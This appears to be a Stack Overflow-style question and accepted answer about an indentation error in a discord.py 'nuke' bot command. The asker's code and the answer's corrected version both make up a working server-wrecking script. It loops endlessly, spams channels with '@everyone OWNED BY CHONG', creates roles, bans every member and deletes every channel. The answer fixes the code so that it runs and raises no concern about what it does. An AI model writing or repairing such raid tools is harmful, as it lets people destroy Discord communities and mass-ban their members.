# So there was an expected indented block error but idk why

Tags: python, discord.py

So I was creating a nuke command and I got an indented block error but idk why,
heres the code:

```
@client.command()
async def nuke(ctx, arg: str, *, name):
    allow_mentions = discord.AllowedMentions(everyone = True)
    guild = ctx.message.guild
    while True:
        channels = await guild.create_text_channel(arg)
        await channels.send(content = "@everyone OWNED BY CHONG")
        guild = ctx.guild
        await guild.create_role(name=name) 
        for user in ctx.guild.members:
        try:
            await user.ban()
        except:
            pass
        for c in ctx.guild.channels:
        await c.delete()
await ctx.message.delete()
```

Answer (score 1, accepted):

```py
@client.command()
async def nuke(ctx, arg: str, *, name):
    allow_mentions = discord.AllowedMentions(everyone = True)
    guild = ctx.message.guild
    while True:
        channels = await guild.create_text_channel(arg)
        await channels.send(content = "@everyone OWNED BY CHONG")
        guild = ctx.guild
        await guild.create_role(name=name) 
        for user in ctx.guild.members:
            try:                      # Correct indentation
                await user.ban()
            except:
                pass
        for c in ctx.guild.channels:
            await c.delete() # Correct indentation
await ctx.message.delete()
```

Comment: Because your indentation was un-acceptable, if you look at the codes after **for user in ctx.guild.members:**  and **for c in ctx.guild.channels:** are right in the same indentation. A code after a condition should be indented.